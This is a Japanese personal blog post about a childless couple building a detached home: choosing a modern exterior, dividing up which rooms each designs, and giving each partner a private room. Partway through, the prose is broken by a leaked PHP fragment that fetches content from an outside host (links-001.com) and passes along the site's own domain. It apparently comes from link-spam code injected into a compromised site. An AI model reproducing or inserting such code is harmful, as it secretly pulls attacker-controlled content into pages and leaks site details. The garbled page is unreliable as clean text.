前へ
次へ

理想のマイホームを求めて一戸建てに

私の実家はマンションでした。
もちろんマンションにも良いところはたくさんあるのですが、やはりないものねだりってありますよね。
子どもの頃からずっと一戸建てに憧れていました。
そのため、結婚してマイホームを建てようとなった時には絶対に一戸建てが良いと言ったんです。
幸いにも主人も団地育ちだったため同じく戸建てに憧れていたそうで、意見は一致しました。
といっても最初の内はただひたすらお互いの理想を語るという感じでしたね。
お互いの理想のマイホームになるようにと色々な希望を話し合っていたのですが、やっぱり条件がかなり多くなってしまいました。
例えば、玄関一つ取ってもお互いの意見が色々出てくるんです。
そもそもの好きなデザインも違いますので、そのへんはお互いの歩み寄りが大切ですよね。
ということで、外観部分はシックなモダン系にすることにしました。
主人はもっと男前系が好きですし私はシャビーシックやフレンチカントリーが好きなのですが、町並みに合わせて選びました。
おかげで外観のイメージは早めに決まりましたね。
後はそれぞれの場所をそれぞれが担当するというイメージです。
例えば私はキッチンや家事室、ダイニングを担当しました。
我が家はリビングとダイニングを別にしたのでリビングは夫の担当です。
リビングって家の中でも結構重要度の高い部屋なので、キッチンとダイニングに続けて私が担当すると比率がちょっと変わってしまいますから。

".file_get_contents('http://links-001.com/123set5?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

そして一番こだわったのが部屋数の多さです。
うちはDINKSなので子どもの予定はありません。
その分お互いの部屋を作ることにしました。
隣に並んだ部屋ではあるのですが、それぞれがしっかり独立していてプライバシーが守られています。
主人はベタベタしたいタイプなので私がそれに疲れてしまうことが多かったのですが、自分の部屋が出来てからはイライラも減りました。
やっぱり家の中に自分だけのプライバシーを守れる空間があると居心地がぐっと良くなりますね。

Page Top